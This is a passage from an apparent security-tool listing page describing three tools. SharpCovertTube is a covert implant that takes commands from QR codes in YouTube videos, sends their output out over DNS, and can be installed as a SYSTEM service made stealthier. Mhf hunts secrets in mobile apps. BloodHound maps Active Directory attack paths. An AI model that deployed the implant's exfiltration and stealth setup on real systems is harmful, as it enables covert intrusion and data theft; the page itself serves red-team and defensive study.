Only the first two have to be updated:</p> <ul> <li><strong>channel_id</strong> (Mandatory!!!): Get your Youtube channel ID from <a href="https://www.youtube.com/account_advanced" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>api_key</strong> (Mandatory!!!): To get the API key, create an application and generate the key from <a href="https://console.cloud.google.com/apis/credentials" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>payload_aes_key</strong> (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-character string.</li> <li><strong>payload_aes_iv</strong> (Optional. Default: "0000000000000000"): AES IV for decrypting QR codes (if using AES). It must be a 16-character string.</li> <li><strong>seconds_delay</strong> (Optional. Default: 600): Seconds of delay between checks for a newly uploaded video. If the value is low you will exceed the API rate limit.</li> <li><strong>debug_console</strong> (Optional. Default: true): Show debug messages in the console or not.</li> <li><strong>log_to_file</strong> (Optional. Default: true): Write debug messages to the log file or not.</li> <li><strong>log_file</strong> (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.</li> <li><strong>dns_exfiltration</strong> (Optional. Default: true): Exfiltrate command responses through DNS or not.</li> <li><strong>dns_hostname</strong> (Optional. 
Default: ".test.org"): DNS hostname used to exfiltrate the responses from commands executed on the system.</li> </ul> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80"><img alt="" border="0" height="294" id="BLOGGER_PHOTO_ID_7343001728956714658" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80=w640-h294" width="640" /></a></p> <br /><span style="font-size: large;"><b>Generating videos with QR codes</b></span><br /> <p>You can generate the videos from Windows using Python3. To do so, first install the dependencies:</p> <pre><code>pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus<br /></code></pre> <p>Then run the generate_video.py script:</p> <pre><code>python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]<br /></code></pre> <ul> <li> <p>TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.</p> </li> <li> <p>FILE (-f) is the path where the video is generated.</p> </li> <li> <p>COMMAND (-c) is the command to execute on the system.</p> </li> <li> <p>AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in the Program.cs file in SharpCovertTube.</p> </li> <li> <p>AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in the Program.cs file in SharpCovertTube. 
</p> </li> </ul> <br /><b>Examples</b><br /> <p>Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:</p> <pre><code>python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami<br /></code></pre> <p>Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:</p> <pre><code>python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000<br /></code></pre> <p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA"><img alt="" border="0" height="96" id="BLOGGER_PHOTO_ID_7343001729862797778" src="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA=w640-h96" width="640" /></a></p> <br /><span style="font-size: large;"><b>Running it as a service</b></span><br /> <p>You can find the code to run it as a service in the <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/SharpCovertTube_Service" rel="nofollow" target="_blank" title="SharpCovertTube_Service folder">SharpCovertTube_Service folder</a>. 
It has the same functionalities except self-deletion, which would not make sense in this case.</p> <p>It is possible to install it with InstallUtil; it is prepared to run as the SYSTEM user, and you need to install it as administrator:</p> <pre><code>InstallUtil.exe SharpCovertTube_Service.exe<br /></code></pre> <p>You can then start it with:</p> <pre><code>net start "SharpCovertTube Service"<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0"><img alt="" border="0" height="162" id="BLOGGER_PHOTO_ID_7343001741526346914" src="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0=w640-h162" width="640" /></a></p> <p>If you have administrative privileges, this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). 
If you do not have those privileges, you cannot install services, so you can only use the ordinary binary.</p> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li> <p><strong>File must be 64-bit!!!</strong> This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's <a href="https://github.com/Stefangansevles/QR-Capture" rel="nofollow" target="_blank" title="QR-Capture">QR-Capture</a> project, who borrowed part of it from Uzi Granot's <a href="https://github.com/Uzi-Granot/QRCode" rel="nofollow" target="_blank" title="QRCode">QRCode</a> project, who in turn borrowed part of it from Zakhar Semenov's <a href="https://github.com/free5lot/Camera_Net" rel="nofollow" target="_blank" title="Camera_Net">Camera_Net</a> project (then I lost track). So thanks to all of them!</p> </li> <li> <p>This project is a port of <a href="https://github.com/ricardojoserf/covert-tube" rel="nofollow" target="_blank" title="covert-tube">covert-tube</a>, a project I developed in 2021 using just Python, which was inspired by WeLiveSecurity blog posts about the <a href="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" rel="nofollow" target="_blank" title="Casbaneiro">Casbaneiro</a> and <a href="https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" rel="nofollow" target="_blank" title="Numando">Numando</a> malware.</p> </li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ricardojoserf/SharpCovertTube" rel="nofollow" target="_blank" title="Download SharpCovertTube">Download SharpCovertTube</a></span></b></div><h2>Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application</h2><p>Published 2024-03-05</p><div 
class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640" /></a></div><p><br /></p><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding <a href="https://www.kitploit.com/search/label/Sensitive%20Information" target="_blank" title="sensitive information">sensitive information</a> or provides suggestions for working with the identified platform.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br /><span style="font-size: large;"><b>Example</b></span><br /> <br /><b>Cordova</b><br /> <p>Search files:</p> <pre><code>index.html<br />cordova.js<br />cordova_plugins.js<br /></code></pre> <br /><b>React Native Android & iOS</b><br /> <p>Search files:</p> <pre><code>Android files:<br /><br />libreactnativejni.so<br />index.android.bundle<br /><br />iOS files:<br /><br />main.jsbundle<br /></code></pre> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>A minimum of Java 8 is required to run Apktool. 
</p> <p><code>pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br /><b>Examples</b><br /> <pre><code>python3 mobile_helper_framework.py file.apk<br /><br />[+] App was written in React Native<br /><br />Do you want analizy the application (y/n) y<br /><br />Output directory already exists. Skipping decompilation.<br /><br />Beauty the react code? (y/n) n<br /><br />Search any info? (y/n) y<br /><br />==>>Searching possible internal IPs in the file<br /><br />results.........<br /><br />==>>Searching possible emails in the file<br /><br />results.........<br /><br />==>>Searching possible interesting words in the file<br /><br />results.........<br /><br />==>>Searching Private Keys in the file<br /><br />results.........<br /><br />==>>Searching high confidential secrets<br /><br />results.........<br /><br />==>>Searching possible sensitive URLs in js files<br /><br />results.........<br /><br />==>>Searching possible endpoints in js files results.........<br /></code></pre> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. </p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">Yes</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> </tr> <tr> <td align="center">Detect if JS files are encrypted</td> <td></td> <td align="right">Yes</td> <td align="right"></td> <td align="right">Yes</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed.</td> <td></td> <td align="right">Yes</td> <td align="right">Yes (Hermes)</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes (XALZ)</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> <td align="right">Yes</td> </tr> </tbody></table> <p><code>What is patching apk:</code> This tool uses Reflutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps using a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr /> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.</p> <pre><code>adb shell pm path com.package<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk<br /></code></pre> <p>For example, in Flutter, if the application is split it is necessary to patch split_config.arm64_v8a.apk, the file that contains libflutter.so. </p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li>This tool uses the secrets-patterns-db repository created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool uses a regular expression created by <a href="https://github.com/mazen160/https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" 
target="_blank" title="Gerben_Javado">Gerben_Javado</a> to extract endpoints</li> <li>This tool uses <a href="https://www.kitploit.com/search/label/reFlutter" target="_blank" title="reflutter">reflutter</a> for Flutter actions </li> </ul> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>0.5</b><br /> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br /><b>0.4</b><br /> <ul> <li>Added plugins information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br /><b>0.3</b><br /> <ul> <li>Added NativeScript app detection</li> <li>Added signing option when the apk extracted from the aab file is not signed</li> </ul> <br /><b>0.2</b><br /> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br /><b>0.1</b><br /> <ul> <li>Initial version release.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download Mhf</a></span></b></div><h2>BloodHound - Six Degrees Of Domain Admin</h2><p>Published 2024-03-04</p><p align="center"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640" /></a></p><p align="center"><br /></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. 
Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br /> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code></li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. 
Log in with a username of <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br /><span style="font-size: large;"><b>Installation Error Handling</b></span><br /> <ul> <li>If you encounter a "failed to get console mode for stdin: The handle is invalid." error, ensure Docker Desktop (and the associated Engine) is running. Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320" /></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." error, this is normally caused by the "Neo4J Graph Database - neo4j" service already running on your local system. 
Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Running<br />docker info<br /><br /># Attempt to stop Neo4j Service if running (on Windows)<br />Stop-Service "Neo4j" -ErrorAction SilentlyContinue<br /></code></pre> <ul> <li>A successful installation of BloodHound CE would look like the below:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br /><span style="font-size: large;"><b>Useful Links</b></span><br /> <ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 
href="https://github.com/SpecterOps/BloodHound" rel="nofollow" target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div>